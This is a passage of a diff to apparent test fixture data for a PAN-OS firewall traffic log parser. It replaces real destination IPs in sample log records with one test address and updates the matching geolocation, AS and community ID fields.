"192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,11964,1,56856,80,0,0,0x200000,tcp,allow,1918,1363,555,21,2012/04/10 04:29:51,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,11964,1,56856,80,0,0,0x200000,tcp,allow,1918,1363,555,21,2012/04/10 04:29:51,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3", "panw": { "panos": { "ruleset": "rule1", @@ -7595,7 +7609,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:jFqkUdvAr9S/yeKacw5dlE+0/o0=", + "community_id": "1:c1StQWp9/T6AVKmJDQmxiODGdOM=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -7633,14 +7647,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 512000000000, - "ingested": "2021-09-08T12:38:09.284151982Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,11964,1,56856,80,0,0,0x200000,tcp,allow,1918,1363,555,21,2012/04/10 04:29:51,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3", + "ingested": "2021-12-09T13:43:22.381909600Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,11964,1,56856,80,0,0,0x200000,tcp,allow,1918,1363,555,21,2012/04/10 04:29:51,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -7663,24 +7677,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -7699,7 +7715,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26502,1,52489,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26502,1,52489,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -7733,7 +7749,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:dQTHsEW3omlFoTmdZu1fchcTb9c=", + "community_id": "1:T6PuZUG1ujd3dGCgk/0pJ3g5ElA=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -7771,14 +7787,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284157925Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26502,1,52489,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381914100Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26502,1,52489,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -7801,27 +7817,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -7840,7 +7855,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26338,1,59298,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26338,1,59298,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -7874,7 +7889,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:BG6Rk6e+H9jRcZHXqRPFG4iA3uU=", + "community_id": "1:Khx1n7BSHDnacX/jmUf9qzaA43E=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -7912,14 +7927,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284162490Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26338,1,59298,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381917700Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26338,1,59298,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -7942,24 +7957,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -7978,7 +7995,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24919,1,60185,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24919,1,60185,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -8012,7 +8029,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:eLVg5C7+4Gz+x6GBj4MlJHk/vyk=", + "community_id": "1:Tx3onLvTrGHWbw9jSpPlhL83coo=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -8050,14 +8067,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284167111Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24919,1,60185,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381922200Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24919,1,60185,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -8080,24 +8097,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -8116,7 +8135,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26731,1,51817,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26731,1,51817,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -8150,7 +8169,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:2v1FAVArMu9Fw0rZTZH/beAYGjs=", + "community_id": "1:LrXKuG1XYjMaeIzdWbYuIH9SBhk=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -8188,14 +8207,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284171648Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26731,1,51817,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381927700Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26731,1,51817,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -8218,27 +8237,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Washington", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -78.1539, - "lat": 38.7095 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 8075, + "number": 4837, "organization": { - "name": "Microsoft Corporation" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 40043, "bytes": 0, - "ip": "65.55.223.31", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -8257,7 +8275,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,65.55.223.31,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26504,1,47752,40043,0,0,0x200000,udp,allow,186,186,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26504,1,47752,40043,0,0,0x200000,udp,allow,186,186,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -8291,7 +8309,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:2fa34ze5XsRR97Shg/2DWoWt57c=", + "community_id": "1:ZvhVKLesx3HCgjQ4hrbMAnhmUEc=", "transport": "udp", "application": "skype-probe", "type": "ipv4", @@ -8329,14 +8347,14 @@ ], "ip": [ "192.168.0.2", - "65.55.223.31", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284180747Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,65.55.223.31,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26504,1,47752,40043,0,0,0x200000,udp,allow,186,186,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381933Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26504,1,47752,40043,0,0,0x200000,udp,allow,186,186,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -8359,27 +8377,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -8398,7 +8415,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25543,1,59297,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25543,1,59297,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -8432,7 +8449,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Sa+u435/AIAAeEelFduJmiGLOv0=", + "community_id": "1:045bWPQTN726UkmixpDOZJC9Yi4=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -8470,14 +8487,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284186495Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25543,1,59297,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381936600Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25543,1,59297,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -8500,24 +8517,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -8536,7 +8555,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,21948,1,52537,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,21948,1,52537,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -8570,7 +8589,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Uym9anPFBcnC+VaX8dVhkzw/pgg=", + "community_id": "1:+QyXDOSn5QU83Zpzf/u/C5O9eZg=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -8608,14 +8627,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284190944Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,21948,1,52537,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381940400Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,21948,1,52537,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -8638,24 +8657,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -8674,7 +8695,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,26279,1,53155,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,26279,1,53155,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -8708,7 +8729,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:BWJpN5ucpEKzwxBd0yrkows1+X4=", + "community_id": "1:xO3lQ3ualTD7YgSjyemycCyFsXM=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -8746,14 +8767,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284195597Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,26279,1,53155,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381944600Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,26279,1,53155,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -8776,24 +8797,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "country_name": "Italy", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Italy", + "region_name": "Jilin", "location": { - "lon": 12.1097, - "lat": 43.1479 - }, - "country_iso_code": "IT" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 3269, + "number": 4837, "organization": { - "name": "Telecom Italia" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 906, - "ip": "62.211.68.12", + "ip": "175.16.199.1", "packets": 7 }, "rule": { @@ -8812,7 +8835,7 @@ }, "packets": 6 }, - "message": "192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24894,1,59197,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:21,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24894,1,59197,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:21,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "panw": { "panos": { "ruleset": "rule1", @@ -8846,7 +8869,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:k2B753fAG7GMJoQhAbMrDsOfDxA=", + "community_id": "1:1Hs2Bdv67IgwL7EEUAUB2v1f0Jc=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -8884,14 +8907,14 @@ ], "ip": [ "192.168.0.2", - "62.211.68.12", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 1000000000, - "ingested": "2021-09-08T12:38:09.284200199Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24894,1,59197,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:21,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", + "ingested": "2021-12-09T13:43:22.381948800Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24894,1,59197,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:21,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -8914,24 +8937,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", 